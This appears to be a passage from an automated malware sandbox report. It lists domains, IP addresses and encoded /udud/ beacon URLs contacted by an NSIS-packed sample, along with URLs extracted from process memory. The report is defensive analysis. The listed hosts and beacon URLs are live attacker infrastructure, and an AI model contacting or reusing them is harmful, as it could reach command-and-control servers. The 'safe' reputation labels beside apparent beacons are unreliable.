                          		3.73.27.108
                          		truetrue
                            		unknown
                            gly.gly301payr.com
                            		162.209.189.152
                            		truefalse
                              		unknown
                              a258paw.yb550.com
                              		147.92.36.247
                              		truetrue
                                		unknown
                                www.gaglianoart.com
                                		3.64.163.50
                                		truetrue
                                  		unknown
                                  drive.google.com
                                  		142.251.16.101
                                  		truefalse
                                    		unknown
                                    www.mindfreak.live
                                    		3.64.163.50
                                    		truetrue
                                      		unknown
                                      www.donantedeovulos.space
                                      		64.190.62.22
                                      		truetrue
                                        		unknown
                                        www.wp-bits.online
                                        		116.203.164.244
                                        		truetrue
                                          		unknown
                                          fivetownsjcc.com
                                          		208.112.85.150
                                          		truetrue
                                            		unknown
                                            www.funtechie.top
                                            		203.161.49.193
                                            		truetrue
                                              		unknown
                                              grimfilm.co.kr
                                              		183.111.161.243
                                              		truetrue
                                                		unknown
                                                www.cookedatthebottom.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.weave.game
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.uhahiq.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.academynadpo.ru
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.grimfilm.co.kr
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.quantumpowerlife.com
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.ntt.creditcard
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.avocatmh.org
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown
                                                                www.578tt67.com
                                                                		unknown
                                                                		unknowntrue
                                                                  		unknown
                                                                  www.fivetownsjcc.com
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown
                                                                    www.4-94.productions
                                                                    		unknown
                                                                    		unknowntrue
                                                                      		unknown
                                                                      www.valentinaetommaso.it
                                                                      		unknown
                                                                      		unknowntrue
                                                                        		unknown
                                                                        www.osbornesargent.co.uk
                                                                        		unknown
                                                                        		unknowntrue
                                                                          		unknown
                                                                          www.noispisok.com
                                                                          		unknown
                                                                          		unknowntrue
                                                                            		unknown

                                                                            Contacted URLs

                                                                            NameMaliciousAntivirus DetectionReputation
                                                                            http://www.uhahiq.com/udud/?Pl9P8ldX=JeW1ywHbInp/iudCt0BoISDa+lnGE8/XYCCr+igFIIlNiJFqeEfQ/jwRjatbRGfuzAuKF9+1993CsJcrjcNhPJvZ+1kkeDtgpfW+DhUrRm2QAt+ZR6HWj8c=&UJ2H=ED2dW8S8UxwlGtrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.donantedeovulos.space/udud/true
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://www.lm2ue.us/udud/true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.fivetownsjcc.com/udud/?78wx=IVkh-DpXGR&Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.noispisok.com/udud/?Pl9P8ldX=o//LU1QIruq3a+llS5WSA3MhPk/fn3r1eotnxTFa/e8OUp/jL5i10F1rY2VLIPDErdjGMTht5s2Ux60YHU9QFnGu9iPsukiHU979EPg7OqcwQWhMz0uyXSg=&UJ2H=ED2dW8S8UxwlGtrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.academynadpo.ru/udud/true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.valentinaetommaso.it/udud/true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.uhahiq.com/udud/true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.wp-bits.online/udud/true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.mindfreak.live/udud/true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.mindfreak.live/udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlGtrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.grimfilm.co.kr/udud/true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.wp-bits.online/udud/?pzH0=GNw0Cp4PdpF&Pl9P8ldX=NYPylna2Z9eGKk0n2zL98jmopuuDXUwTW1hg/NJ4dH1aG6U36Zymeq8Q+jA5ULsRtwMU5Sxc1U1KJPrtknew8LZ9GrpjSEZ/84zq63NvruY/sq3UYTRA7EE=true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.academynadpo.ru/udud/?Pl9P8ldX=lxKI396dcfUopLOCgIwHig2W2DxUvRX97MJRzioDZqj6Mq9AZ90i2wJz7BzjxOGPWVxSz39xtFFcwgb3QegZat7wpytzNwJDmdPz0ImKOxyDMBvGUlbFyek=&pzH0=GNw0Cp4PdpFtrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.gaglianoart.com/udud/?78wx=IVkh-DpXGR&Pl9P8ldX=s4Vg1LN8KF8xRZjsTtx1ePAa6rrZ5tQl+fVkjM0Cwqz81ntfAq/M/gVPDnM69uqRMv9oQTSMlpkV8bcLOwxh9sPoo9S5h5afGeOqgp9TfQfssWCdBUAOLW8=true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.avocatmh.org/udud/?Pl9P8ldX=CE5650FDbfXnpQA/eK0NgrbRbNtPjFAUxQ7joq83O2JD2van08dDJXT7jPsZwBcB76Ina7ciMfrueGFKvr7HGptlhVNK1F0UnKlYvzZl0mKZiEoX7KROJkU=&UJ2H=ED2dW8S8UxwlGtrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.avocatmh.org/udud/true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.lm2ue.us/udud/?Pl9P8ldX=0fut0+GuUFbft3VBL5xm0Hp90TDKfhipdS4VXGxzAEleMWehH5gQwP182GbMnYpRKYVXdyZjU035jwIjvCFAGk2/B20KDJmRwuIeT4QhTHXMvWA5X1/HJWk=&UJ2H=ED2dW8S8UxwlGtrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.noispisok.com/udud/true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.maxiwalls.com/udud/true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.maxiwalls.com/udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlGtrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.l7aeh.us/udud/true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlGtrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.donantedeovulos.space/udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlGtrue
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://www.l7aeh.us/udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlGtrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.funtechie.top/udud/true
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.fivetownsjcc.com/udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlGtrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown

                                                                            URLs from Memory and Binaries

                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                            https://duckduckgo.com/chrome_newtabwrite.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchwrite.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://assets.iv.lt/header.htmljbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://duckduckgo.com/ac/?q=write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://ogp.me/ns#jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.jsjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://goge8opp.com:301jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000777E000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000697E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDNondesistance.exe, 00000009.00000001.20120981057.0000000000626000.00000020.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.namesilo.comjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006C80000.00000004.80000000.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25038661256.00000000078C0000.00000004.00000800.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.gopher.ftp://ftp.Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.iv.lt/domenai/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.google.comNondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.webnode.it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campaign=signaturejbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.osbornesargent.co.uk/udud/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25030471443.0000000000648000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://assets.iv.lt/images/thumbnail.pngwrite.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.iv.lt/duomenu-centras/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.mindfreak.live/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006FA4000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000061A4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006E12000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000006012000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.iv.lt/profesionalus-hostingas/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.namesilo.com/domain/search-domains?query=lm2ue.usjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.valentinaetommaso.it/page-not-found-404/write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://assets.iv.lt/footer.htmljbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://tilda.ccjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://login.liwrite.exe, 0000000B.00000002.25029531563.0000000002A4B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.netjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.iv.lt/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://tilda.ws/img/logo404.pngjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.gandi.net/en/domainjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000072C8000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000064C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://nsis.sf.net/NSIS_ErrorErrorNondesistance.exefalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.ecosia.org/newtab/write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://nsis.sf.net/NSIS_ErrorNondesistance.exefalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.iv.lt/vps-serveriai/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://klientams.iv.lt/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campajbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.namesilo.com/domain/search-domains?query=l7aeh.usjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006C80000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25038661256.00000000078C0000.00000004.00000800.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/1a/1an/1anfpg.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://events.webnode.com/projects/-/events/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://assets.iv.lt/default.cssjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdNondesistance.exe, 00000009.00000001.20120981057.00000000005F2000.00000020.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://assets.iv.lt/images/icon.pngwrite.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://drive.usercontent.google.com/xNondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://apis.google.comNondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.iv.lt/talpinimo-planai/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://whois.gandi.net/en/results?search=avocatmh.orgjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000072C8000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000064C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://img.sedoparking.com/templates/bg/NameSiloLogo.pngjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006C80000.00000004.80000000.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.iv.lt/neribotas-svetainiu-talpinimas/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
